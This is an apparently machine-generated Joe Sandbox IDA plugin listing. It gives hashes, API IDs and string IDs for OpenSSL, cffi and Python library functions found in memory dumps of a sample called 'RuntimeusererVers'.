                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e500000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: DeallocErr_Long_SignString
                                                                                                                                                                                                                                          • String ID: an integer is required$can't convert negative number to unsigned$integer conversion failed
                                                                                                                                                                                                                                          • API String ID: 2527065810-2728004092
                                                                                                                                                                                                                                          • Opcode ID: e5752ed05275e9679b5798b7c94d40159ae5a61899539a8866921309a2303650
                                                                                                                                                                                                                                          • Instruction ID: 6e9ef737e4822c6970d50dc318a28f9ca0b0f9360f80f85aee7abe28a83698ad
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e5752ed05275e9679b5798b7c94d40159ae5a61899539a8866921309a2303650
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D7311A31B19E42C1EA588B56E9602BA6361EF88BF4F085331EE6D077D9DE2DF4518300
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1577633708.00007FF81E081000.00000020.00000001.01000000.0000003C.sdmp, Offset: 00007FF81E080000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1577554084.00007FF81E080000.00000002.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1577633708.00007FF81E0F4000.00000020.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1577887521.00007FF81E0F6000.00000002.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578021546.00007FF81E119000.00000008.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578087716.00007FF81E11D000.00000004.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578182269.00007FF81E11E000.00000002.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578182269.00007FF81E124000.00000002.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578182269.00007FF81E12B000.00000002.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e080000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: O_ctrlO_freeO_newO_s_fileR_put_error
                                                                                                                                                                                                                                          • String ID: ..\s\ssl\ssl_rsa.c
                                                                                                                                                                                                                                          • API String ID: 2618924202-2723262194
                                                                                                                                                                                                                                          • Opcode ID: d9b458d87d1dcdf048473b1e37ef7f024ece06dd3e70e12fcda0ab5187114a4e
                                                                                                                                                                                                                                          • Instruction ID: ba4488ac4991a494e9aa347e5f7427f289c4fc6b8cca2d38bd9c694bfa23183f
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d9b458d87d1dcdf048473b1e37ef7f024ece06dd3e70e12fcda0ab5187114a4e
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 36318D25A0CB8686FE24DB5295006BA7391FB44BE4F044235EE8D1BB86DF7DF6018B80
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1583070422.00007FF81E501000.00000020.00000001.01000000.00000036.sdmp, Offset: 00007FF81E500000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583033638.00007FF81E500000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583104278.00007FF81E51C000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583140748.00007FF81E529000.00000004.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583198579.00007FF81E52F000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e500000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: List_$Dealloc$AppendErr_ErrorFatalFuncPackStringTuple_strncmp
                                                                                                                                                                                                                                          • String ID: fields
                                                                                                                                                                                                                                          • API String ID: 1806387768-2128995208
                                                                                                                                                                                                                                          • Opcode ID: 6a110e24107b0bce30bf785109677027d94326803449cd0a4ecfcf18fd09ef9b
                                                                                                                                                                                                                                          • Instruction ID: 1a0b4b62c15ad7855f258727b2cb658ae69b2bb3696ca5b9af252322fabed4f7
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6a110e24107b0bce30bf785109677027d94326803449cd0a4ecfcf18fd09ef9b
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E8314B35A08E4281EA689B16EC642B963A4FF48FE4F480635EF4E47755DE2DF4818700
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1583070422.00007FF81E501000.00000020.00000001.01000000.00000036.sdmp, Offset: 00007FF81E500000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583033638.00007FF81E500000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583104278.00007FF81E51C000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583140748.00007FF81E529000.00000004.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583198579.00007FF81E52F000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e500000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: memcmp
                                                                                                                                                                                                                                          • String ID: number too large$void$volatile
                                                                                                                                                                                                                                          • API String ID: 1475443563-2072166545
                                                                                                                                                                                                                                          • Opcode ID: f0969988755079966e3496a8f985795f53b3aff444b1fe376a0ce731303e40a2
                                                                                                                                                                                                                                          • Instruction ID: 6a99ff040061b74edd1d463f075f0f6ea6d4587eee02a048786e419a68a46e2b
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f0969988755079966e3496a8f985795f53b3aff444b1fe376a0ce731303e40a2
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7D312CB2B08E4686EB658B28DC242F926A1FB54BF4F504332CA5D466D8DF7CF485C611
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1583070422.00007FF81E501000.00000020.00000001.01000000.00000036.sdmp, Offset: 00007FF81E500000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583033638.00007FF81E500000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583104278.00007FF81E51C000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583140748.00007FF81E529000.00000004.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583198579.00007FF81E52F000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e500000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: memcmp
                                                                                                                                                                                                                                          • String ID: number too large$union$unsigned
                                                                                                                                                                                                                                          • API String ID: 1475443563-127238505
                                                                                                                                                                                                                                          • Opcode ID: caa5d682b14a3d019b3f56c8df904d3cd9bd7edb7d61d04720887a831c2be78d
                                                                                                                                                                                                                                          • Instruction ID: 6ee2b79fe4f5f57b6e0aa0e0161710fcae07aa2a9272e4d41805ceb1db6fb3ce
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: caa5d682b14a3d019b3f56c8df904d3cd9bd7edb7d61d04720887a831c2be78d
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 52314F72B18A4686EB654B28DC242F926A1EB44BF4F414332C95E426D8DF7CF485C611
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1583070422.00007FF81E501000.00000020.00000001.01000000.00000036.sdmp, Offset: 00007FF81E500000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583033638.00007FF81E500000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583104278.00007FF81E51C000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583140748.00007FF81E529000.00000004.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583198579.00007FF81E52F000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e500000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Err_Format$Dealloc
                                                                                                                                                                                                                                          • String ID: constant '%s' is of type '%s', whose size is not known
                                                                                                                                                                                                                                          • API String ID: 1818262499-580431848
                                                                                                                                                                                                                                          • Opcode ID: 82866fd6ac399a1c7e64142fb9a46d338c5260eaab25e683194998cdb47f7939
                                                                                                                                                                                                                                          • Instruction ID: e87b53f06b9dbc96bab3b912ed86c331bccdfdd181cd91ad827d562a4b5ac4e8
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 82866fd6ac399a1c7e64142fb9a46d338c5260eaab25e683194998cdb47f7939
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0D216062A0AE4281EA699B669C743FDA3A1EF55FF4F094635CE0E47380EE3CF4418340
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1577633708.00007FF81E081000.00000020.00000001.01000000.0000003C.sdmp, Offset: 00007FF81E080000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1577554084.00007FF81E080000.00000002.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1577633708.00007FF81E0F4000.00000020.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1577887521.00007FF81E0F6000.00000002.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578021546.00007FF81E119000.00000008.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578087716.00007FF81E11D000.00000004.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578182269.00007FF81E11E000.00000002.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578182269.00007FF81E124000.00000002.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578182269.00007FF81E12B000.00000002.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e080000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: D_sizeDigestFinal_exX_copy_exX_freeX_mdX_new
                                                                                                                                                                                                                                          • String ID: ..\s\ssl\ssl_lib.c
                                                                                                                                                                                                                                          • API String ID: 2082763299-1080266419
                                                                                                                                                                                                                                          • Opcode ID: 6fafbb813f3c90a8b0ecf3d9fb55de0c2d6812930547c3e67c08dcc7d4d451ba
                                                                                                                                                                                                                                          • Instruction ID: 6f4b0ea96793e3a46ec275c1f4f6188840432b522a66ca98086e9ac711ec637c
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6fafbb813f3c90a8b0ecf3d9fb55de0c2d6812930547c3e67c08dcc7d4d451ba
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4121AF31B0CB4A81EE20EA56B845A7E7791BB84BE4F144234FE4D47796DE3CF8828700
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1583070422.00007FF81E501000.00000020.00000001.01000000.00000036.sdmp, Offset: 00007FF81E500000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583033638.00007FF81E500000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583104278.00007FF81E51C000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583140748.00007FF81E529000.00000004.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583198579.00007FF81E52F000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e500000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Err_Long$AttrDict_GenericItemLong_Object_OccurredString
                                                                                                                                                                                                                                          • String ID: cannot delete struct field$cdata '%s' has no attribute '%s'$cdata '%s' has no field '%s'$cdata '%s' points to an opaque type: cannot write fields
                                                                                                                                                                                                                                          • API String ID: 3507916589-3282381042
                                                                                                                                                                                                                                          • Opcode ID: 2fb8949cfd7055b42365fb47f49a66e13b159a0951d6fd7751c6fae33a59d8c1
                                                                                                                                                                                                                                          • Instruction ID: 6979712014ee6e020626002436162c395f7b5c4535a18840648c9ce0a529630c
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2fb8949cfd7055b42365fb47f49a66e13b159a0951d6fd7751c6fae33a59d8c1
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 23314B71A08F52C1EA649B16DC602B92760FB45BE8F685331EE5D57B99CFBCF4828310
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1582033096.00007FF81E4E1000.00000020.00000001.01000000.00000037.sdmp, Offset: 00007FF81E4E0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1581472246.00007FF81E4E0000.00000002.00000001.01000000.00000037.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1582460342.00007FF81E4E7000.00000002.00000001.01000000.00000037.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1582744405.00007FF81E4EC000.00000004.00000001.01000000.00000037.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1582953118.00007FF81E4EE000.00000002.00000001.01000000.00000037.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e4e0000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Err_$Eval_FormatStringThread$Bytes_ClearFromModule_R_peek_last_errorRestoreSaveSizeState
                                                                                                                                                                                                                                          • String ID: key is too long.$msg is too long.
                                                                                                                                                                                                                                          • API String ID: 2257326627-4266787399
                                                                                                                                                                                                                                          • Opcode ID: 6edc14c27999011314cc1382c16e8a2fece4d5611161cd3cadbcc76680a4b285
                                                                                                                                                                                                                                          • Instruction ID: 196e5f94e759599758f901cf01d035a6cf363942ee49f0b04c75cb4472eff413
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6edc14c27999011314cc1382c16e8a2fece4d5611161cd3cadbcc76680a4b285
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 71313022A08F8382EA60DB11F4447BAA360FB89BE4F554735DA9D46B55EF7CF0A5C700
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1583070422.00007FF81E501000.00000020.00000001.01000000.00000036.sdmp, Offset: 00007FF81E500000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583033638.00007FF81E500000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583104278.00007FF81E51C000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583140748.00007FF81E529000.00000004.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583198579.00007FF81E52F000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e500000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Err_String$Arg_Object_ParseSizeTuple_
                                                                                                                                                                                                                                          • String ID: O!O!n:rawaddressof$expected a cdata struct/union/array/pointer object$expected a pointer ctype
                                                                                                                                                                                                                                          • API String ID: 2388938685-375230600
                                                                                                                                                                                                                                          • Opcode ID: 8a58a3e0127d0a01c3f41e354eebc1edee0e2c4a1ef7c38c2b15cc691f176895
                                                                                                                                                                                                                                          • Instruction ID: b837150f209940038e005cfd9b12015ef347cde4544db670d04c98314a4dc94f
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8a58a3e0127d0a01c3f41e354eebc1edee0e2c4a1ef7c38c2b15cc691f176895
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: EB312F32A08F46C2EB04DB15F8501A973A1FB89BE4F490232DA9D43B68CF3CE495C700
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1566347608.00007FF81DC71000.00000020.00000001.01000000.0000004D.sdmp, Offset: 00007FF81DC70000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1566298623.00007FF81DC70000.00000002.00000001.01000000.0000004D.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1566383557.00007FF81DC73000.00000002.00000001.01000000.0000004D.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1566435114.00007FF81DC75000.00000004.00000001.01000000.0000004D.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1566474761.00007FF81DC76000.00000002.00000001.01000000.0000004D.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81dc70000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ModuleType_$Arg_$KeywordsPositional
                                                                                                                                                                                                                                          • String ID: SimpleQueue
                                                                                                                                                                                                                                          • API String ID: 4181285317-3395603730
                                                                                                                                                                                                                                          • Opcode ID: d95f10c0e63c29ebf7223734b2b99d6cd48966227eee888d90296c3057f4ddec
                                                                                                                                                                                                                                          • Instruction ID: 010759e406cdb409d8eb85a73e2a023b81cd3c5515f1e70450e06be0625cdfcb
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d95f10c0e63c29ebf7223734b2b99d6cd48966227eee888d90296c3057f4ddec
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 24214D67A09F4291EB508F15E8902696761FB49FE0F485A32DA5F8F764EF3CE456C300
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1583070422.00007FF81E501000.00000020.00000001.01000000.00000036.sdmp, Offset: 00007FF81E500000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583033638.00007FF81E500000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583104278.00007FF81E51C000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583140748.00007FF81E529000.00000004.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583198579.00007FF81E52F000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e500000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Long$FromLong_$Err_FormatUnsigned__stdio_common_vsprintf
                                                                                                                                                                                                                                          • String ID: %lld$%llu (0x%llx)$the C compiler says '%.200s' is equal to %s, but the cdef disagrees
                                                                                                                                                                                                                                          • API String ID: 2237024420-3737824454
                                                                                                                                                                                                                                          • Opcode ID: df06fad3afa54220fc452e0c9850cfb64ccd43297c46cf104806003e12bb5a46
                                                                                                                                                                                                                                          • Instruction ID: b99aa47bd3b981623929548c7ea4de8cb985c9839fe86d3972c11a1bee874621
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: df06fad3afa54220fc452e0c9850cfb64ccd43297c46cf104806003e12bb5a46
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1C215E21A18D83C1EA248B60ECA03F96360FF887E8F981335E58E466A4DF3DF545C740
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1577633708.00007FF81E081000.00000020.00000001.01000000.0000003C.sdmp, Offset: 00007FF81E080000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1577554084.00007FF81E080000.00000002.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1577633708.00007FF81E0F4000.00000020.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1577887521.00007FF81E0F6000.00000002.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578021546.00007FF81E119000.00000008.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578087716.00007FF81E11D000.00000004.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578182269.00007FF81E11E000.00000002.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578182269.00007FF81E124000.00000002.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578182269.00007FF81E12B000.00000002.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e080000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: O_f_bufferO_int_ctrlO_newO_push
                                                                                                                                                                                                                                          • String ID: ..\s\ssl\ssl_lib.c
                                                                                                                                                                                                                                          • API String ID: 1655923927-1080266419
                                                                                                                                                                                                                                          • Opcode ID: ab03b8435c53bbb2385763fffbc927048ad75653c08c6005caab1ccea8af9f44
                                                                                                                                                                                                                                          • Instruction ID: dc6d72c540e401a8ffd09c517eac90ef2752130bc7b647913d92fdae81368b42
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ab03b8435c53bbb2385763fffbc927048ad75653c08c6005caab1ccea8af9f44
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E1115622F09A4682EF64DB65F5017A963A0FF847D4F540630EB4D47B95EF3DF9918600
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1578637831.00007FF81E131000.00000020.00000001.01000000.0000003B.sdmp, Offset: 00007FF81E130000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578429679.00007FF81E130000.00000002.00000001.01000000.0000003B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578694735.00007FF81E13D000.00000002.00000001.01000000.0000003B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578785676.00007FF81E14E000.00000004.00000001.01000000.0000003B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578942677.00007FF81E14F000.00000008.00000001.01000000.0000003B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1579030056.00007FF81E154000.00000004.00000001.01000000.0000003B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1579098759.00007FF81E155000.00000002.00000001.01000000.0000003B.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e130000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: E_print_exErr_O_freeO_newO_s_memStringX509_
                                                                                                                                                                                                                                          • String ID: failed to allocate BIO$strict
                                                                                                                                                                                                                                          • API String ID: 220268057-2811890329
                                                                                                                                                                                                                                          • Opcode ID: 991b8a1bac33d2e35db9772ee8d872af6fbf35397be101dd694b8269714c3bc8
                                                                                                                                                                                                                                          • Instruction ID: cda887f5da0676c698bb22cb5b55d5145d4cb47ef47554c783c2788563b0a33e
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 991b8a1bac33d2e35db9772ee8d872af6fbf35397be101dd694b8269714c3bc8
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: AC117066B08E4381FA109B26B80412AA361FF88FF2F894231ED4E47B65DF3CF4958740
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1583070422.00007FF81E501000.00000020.00000001.01000000.00000036.sdmp, Offset: 00007FF81E500000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583033638.00007FF81E500000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583104278.00007FF81E51C000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583140748.00007FF81E529000.00000004.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583198579.00007FF81E52F000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e500000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ComplexComplex_From$Err_Format
                                                                                                                                                                                                                                          • String ID: complex() not supported on cdata '%s'$read_raw_complex_data$read_raw_complex_data: bad complex size
                                                                                                                                                                                                                                          • API String ID: 3215717669-1323234755
                                                                                                                                                                                                                                          • Opcode ID: 1a8498c5ee1679d093f8f66ed024d2e4399b725d0942e42e1b5f693d24dd55ee
                                                                                                                                                                                                                                          • Instruction ID: 15f24e078edcc193e3cd95210d862cb91e7e074dc38bdbe574792c8751cec0f7
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1a8498c5ee1679d093f8f66ed024d2e4399b725d0942e42e1b5f693d24dd55ee
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B6119D31D08A8687EA15DB28E8611E87360FF957A9F504322E64C92521EF6DF69ACB00
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1566347608.00007FF81DC71000.00000020.00000001.01000000.0000004D.sdmp, Offset: 00007FF81DC70000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1566298623.00007FF81DC70000.00000002.00000001.01000000.0000004D.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1566383557.00007FF81DC73000.00000002.00000001.01000000.0000004D.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1566435114.00007FF81DC75000.00000004.00000001.01000000.0000004D.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1566474761.00007FF81DC76000.00000002.00000001.01000000.0000004D.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
